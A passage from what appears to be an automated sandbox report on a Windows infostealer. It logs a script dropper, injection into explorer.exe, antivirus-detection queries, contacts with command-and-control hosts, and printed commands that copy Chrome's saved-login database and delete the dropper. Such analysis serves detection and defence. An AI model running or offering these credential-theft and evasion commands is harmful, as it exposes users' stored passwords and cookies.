Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C32990 mov eax, dword ptr fs:[00000030h] 9_2_00C32990
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C3FD9B mov eax, dword ptr fs:[00000030h] 9_2_00C3FD9B
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00CD05AC mov eax, dword ptr fs:[00000030h] 9_2_00CD05AC
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C335A1 mov eax, dword ptr fs:[00000030h] 9_2_00C335A1
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C361A0 mov eax, dword ptr fs:[00000030h] 9_2_00C361A0
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C869A6 mov eax, dword ptr fs:[00000030h] 9_2_00C869A6
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C31DB5 mov eax, dword ptr fs:[00000030h] 9_2_00C31DB5
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C851BE mov eax, dword ptr fs:[00000030h] 9_2_00C851BE
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C2B944 mov eax, dword ptr fs:[00000030h] 9_2_00C2B944
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C43D43 mov eax, dword ptr fs:[00000030h] 9_2_00C43D43
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C83540 mov eax, dword ptr fs:[00000030h] 9_2_00C83540
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C27D50 mov eax, dword ptr fs:[00000030h] 9_2_00C27D50
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C0C962 mov eax, dword ptr fs:[00000030h] 9_2_00C0C962
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C0B171 mov eax, dword ptr fs:[00000030h] 9_2_00C0B171
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C2C577 mov eax, dword ptr fs:[00000030h] 9_2_00C2C577
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C09100 mov eax, dword ptr fs:[00000030h] 9_2_00C09100
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C24120 mov eax, dword ptr fs:[00000030h] 9_2_00C24120
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C24120 mov ecx, dword ptr fs:[00000030h] 9_2_00C24120
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C0AD30 mov eax, dword ptr fs:[00000030h] 9_2_00C0AD30
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C13D34 mov eax, dword ptr fs:[00000030h] 9_2_00C13D34
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00CCE539 mov eax, dword ptr fs:[00000030h] 9_2_00CCE539
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C34D3B mov eax, dword ptr fs:[00000030h] 9_2_00C34D3B
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00CD8D34 mov eax, dword ptr fs:[00000030h] 9_2_00CD8D34
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C3513A mov eax, dword ptr fs:[00000030h] 9_2_00C3513A
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C8A537 mov eax, dword ptr fs:[00000030h] 9_2_00C8A537
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C48EC7 mov eax, dword ptr fs:[00000030h] 9_2_00C48EC7
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C32ACB mov eax, dword ptr fs:[00000030h] 9_2_00C32ACB
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00CBFEC0 mov eax, dword ptr fs:[00000030h] 9_2_00CBFEC0
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C336CC mov eax, dword ptr fs:[00000030h] 9_2_00C336CC
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00CD8ED6 mov eax, dword ptr fs:[00000030h] 9_2_00CD8ED6
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C316E0 mov ecx, dword ptr fs:[00000030h] 9_2_00C316E0
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C176E2 mov eax, dword ptr fs:[00000030h] 9_2_00C176E2
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C32AE4 mov eax, dword ptr fs:[00000030h] 9_2_00C32AE4
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C9FE87 mov eax, dword ptr fs:[00000030h] 9_2_00C9FE87
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C3D294 mov eax, dword ptr fs:[00000030h] 9_2_00C3D294
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C052A5 mov eax, dword ptr fs:[00000030h] 9_2_00C052A5
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00CD0EA5 mov eax, dword ptr fs:[00000030h] 9_2_00CD0EA5
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C846A7 mov eax, dword ptr fs:[00000030h] 9_2_00C846A7
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C1AAB0 mov eax, dword ptr fs:[00000030h] 9_2_00C1AAB0
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C3FAB0 mov eax, dword ptr fs:[00000030h] 9_2_00C3FAB0
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C09240 mov eax, dword ptr fs:[00000030h] 9_2_00C09240
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C17E41 mov eax, dword ptr fs:[00000030h] 9_2_00C17E41
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00CCAE44 mov eax, dword ptr fs:[00000030h] 9_2_00CCAE44
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00CCEA55 mov eax, dword ptr fs:[00000030h] 9_2_00CCEA55
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C94257 mov eax, dword ptr fs:[00000030h] 9_2_00C94257
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00CBB260 mov eax, dword ptr fs:[00000030h] 9_2_00CBB260
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C1766D mov eax, dword ptr fs:[00000030h] 9_2_00C1766D
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00CD8A62 mov eax, dword ptr fs:[00000030h] 9_2_00CD8A62
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C2AE73 mov eax, dword ptr fs:[00000030h] 9_2_00C2AE73
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C4927A mov eax, dword ptr fs:[00000030h] 9_2_00C4927A
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C0C600 mov eax, dword ptr fs:[00000030h] 9_2_00C0C600
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C38E00 mov eax, dword ptr fs:[00000030h] 9_2_00C38E00
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00CC1608 mov eax, dword ptr fs:[00000030h] 9_2_00CC1608
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C18A0A mov eax, dword ptr fs:[00000030h] 9_2_00C18A0A
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C05210 mov eax, dword ptr fs:[00000030h] 9_2_00C05210
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C05210 mov ecx, dword ptr fs:[00000030h] 9_2_00C05210
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C0AA16 mov eax, dword ptr fs:[00000030h] 9_2_00C0AA16
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C23A1C mov eax, dword ptr fs:[00000030h] 9_2_00C23A1C
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C3A61C mov eax, dword ptr fs:[00000030h] 9_2_00C3A61C
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C0E620 mov eax, dword ptr fs:[00000030h] 9_2_00C0E620
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C44A2C mov eax, dword ptr fs:[00000030h] 9_2_00C44A2C
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00CBFE3F mov eax, dword ptr fs:[00000030h] 9_2_00CBFE3F
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C853CA mov eax, dword ptr fs:[00000030h] 9_2_00C853CA
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C303E2 mov eax, dword ptr fs:[00000030h] 9_2_00C303E2
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C2DBE9 mov eax, dword ptr fs:[00000030h] 9_2_00C2DBE9
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C437F5 mov eax, dword ptr fs:[00000030h] 9_2_00C437F5
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00CC138A mov eax, dword ptr fs:[00000030h] 9_2_00CC138A
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00CBD380 mov ecx, dword ptr fs:[00000030h] 9_2_00CBD380
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C11B8F mov eax, dword ptr fs:[00000030h] 9_2_00C11B8F
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C3B390 mov eax, dword ptr fs:[00000030h] 9_2_00C3B390
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C32397 mov eax, dword ptr fs:[00000030h] 9_2_00C32397
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C18794 mov eax, dword ptr fs:[00000030h] 9_2_00C18794
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C87794 mov eax, dword ptr fs:[00000030h] 9_2_00C87794
Source: C:\Users\user\AppData\Local\Temp\bin.exe Process queried: DebugPort
Source: C:\Windows\SysWOW64\help.exe Process queried: DebugPort
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C498F0 NtReadVirtualMemory,LdrInitializeThunk, 2_2_00C498F0

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\System32\wscript.exe File created: bin.exe.0.dr
Source: C:\Windows\explorer.exe Network Connect: 81.169.145.161 80
Source: C:\Windows\explorer.exe Domain query: www.topings33.com
Source: C:\Windows\explorer.exe Network Connect: 185.53.179.172 80
Source: C:\Windows\explorer.exe Network Connect: 85.159.66.93 80
Source: C:\Windows\explorer.exe Domain query: www.localbloom.online
Source: C:\Windows\explorer.exe Network Connect: 23.19.171.24 80
Source: C:\Windows\explorer.exe Domain query: www.siberup.xyz
Source: C:\Windows\explorer.exe Domain query: www.brandpay.xyz
Source: C:\Windows\explorer.exe Domain query: www.getbusinesscreditandfunding.com
Source: C:\Windows\explorer.exe Domain query: www.shcylzc.com
Source: C:\Windows\explorer.exe Domain query: www.thepowerofanopenquestion.com
Source: C:\Windows\explorer.exe Domain query: www.xn--wsthof-camping-gsb.com
Source: C:\Windows\explorer.exe Network Connect: 198.54.117.217 80
Source: C:\Windows\explorer.exe Domain query: www.vitality-patients.online
Source: C:\Windows\System32\wscript.exe Domain query: dilshadkhan.duia.ro
Source: C:\Windows\explorer.exe Network Connect: 3.64.163.50 80
Source: C:\Windows\explorer.exe Domain query: www.harmlett.com
Source: C:\Windows\explorer.exe Network Connect: 162.0.230.89 80
Source: C:\Windows\explorer.exe Domain query: www.waermark.com
Source: C:\Windows\explorer.exe Domain query: www.jdhwh2nbiw234.com
Source: C:\Windows\explorer.exe Network Connect: 68.66.224.33 80
Source: C:\Windows\explorer.exe Network Connect: 185.27.134.149 80
Source: C:\Windows\explorer.exe Domain query: www.tentanguang.online
Source: C:\Windows\explorer.exe Domain query: www.angelmatic.net
Source: C:\Windows\explorer.exe Network Connect: 185.134.245.113 80
Source: C:\Windows\explorer.exe Network Connect: 23.82.37.10 80
Source: C:\Windows\System32\wscript.exe Network Connect: 91.193.75.133 6670
Source: C:\Windows\explorer.exe Domain query: www.gafcbooster.com
Source: C:\Users\user\AppData\Local\Temp\bin.exe Section unmapped: C:\Windows\SysWOW64\help.exe base address: 13C0000
Source: C:\Users\user\AppData\Local\Temp\bin.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\AppData\Local\Temp\bin.exe Section loaded: unknown target: C:\Windows\SysWOW64\help.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\help.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\help.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\help.exe Section loaded: unknown target: unknown protection: read write
Source: C:\Users\user\AppData\Local\Temp\bin.exe Thread APC queued: target process: C:\Windows\explorer.exe
Source: C:\Users\user\AppData\Local\Temp\bin.exe Thread register set: target process: 3688
Source: C:\Windows\SysWOW64\help.exe Thread register set: target process: 3688
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\RmiIjXZkdd.js"
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Local\Temp\bin.exe "C:\Users\user\AppData\Local\Temp\bin.exe"
Source: C:\Windows\SysWOW64\help.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Local\Temp\bin.exe"
Source: C:\Windows\SysWOW64\help.exe Process created: C:\Windows\SysWOW64\cmd.exe /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V
Source: explorer.exe, 00000003.00000000.439768736.0000000000D70000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.446508824.00000000058B0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.536654826.000000000081C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000003.00000000.402775059.0000000000778000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.470593620.0000000000778000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.439768736.0000000000D70000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000003.00000000.439768736.0000000000D70000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.471049748.0000000000D70000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.403164706.0000000000D70000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
Source: explorer.exe, 00000003.00000000.439768736.0000000000D70000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.471049748.0000000000D70000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.403164706.0000000000D70000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: }Program Manager
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: wscript.exe, 00000008.00000002.931604379.0000020FBE96F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: r\MsMpeng.exe
Source: wscript.exe, 00000001.00000003.676835917.0000022182300000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.842626343.00000221FFF32000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.500327144.00000221822C7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: wscript.exe, 00000001.00000002.908396849.00000221FFEFE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \MsMpeng.exe

Stealing of Sensitive Information

Source: Yara match File source: 0.3.wscript.exe.18737493000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.0.u8g48fg0phzxan.exe.1200000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.u8g48fg0phzxan.exe.1200000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.bin.exe.fc0000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.0.u8g48fg0phzxan.exe.1200000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.0.u8g48fg0phzxan.exe.1200000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.wscript.exe.18737493000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.0.u8g48fg0phzxan.exe.1200000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.0.bin.exe.fc0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000009.00000002.930406757.00000000035D7000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.396143757.0000018737B4E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.907157979.00000000004B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.396132606.000001873784D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.907218726.0000000000700000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.907579825.00000000007AD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.506353568.0000000000AD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000000.476161030.00000000056FF000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.506312431.0000000000AA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.509633040.0000000000FC1000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.403282167.000001873784D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.401485151.000001873784D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000000.871758579.0000000001201000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.876080332.0000000001201000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000000.871170118.0000000001201000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000000.870726795.0000000001201000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000000.446024174.00000000056FF000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.403466311.0000018737EA0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000000.871469677.0000000001201000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.397537336.0000018737493000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000000.395957162.0000000000FC1000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.907268492.0000000000730000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.402063776.000001873784D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\bin.exe, type: DROPPED
Source: Yara match File source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe, type: DROPPED
Source: Yara match File source: 00000004.00000003.422284630.0000014D0B276000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.931430128.0000020FBE071000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.927889080.0000014D0B272000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.921876626.0000020FBC1E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.393763999.0000022181D85000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.465086435.0000020FBE075000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.908396849.00000221FFEFE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.464882412.0000020FBE075000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.923762236.0000014D095CE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.907846772.0000022181D81000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.922485204.0000026A515F0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.422300954.0000014D0B276000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.922294824.0000026A4F89A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.923787188.0000014D095D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.393894114.0000022181D85000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.922283429.0000026A4F890000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.921864833.0000020FBC1DE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: wscript.exe PID: 6132, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: wscript.exe PID: 5812, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: wscript.exe PID: 1272, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: wscript.exe PID: 6040, type: MEMORYSTR
Source: C:\Windows\SysWOW64\help.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
Source: C:\Windows\SysWOW64\help.exe File opened: C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Login Data
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\help.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies

Remote Access Functionality
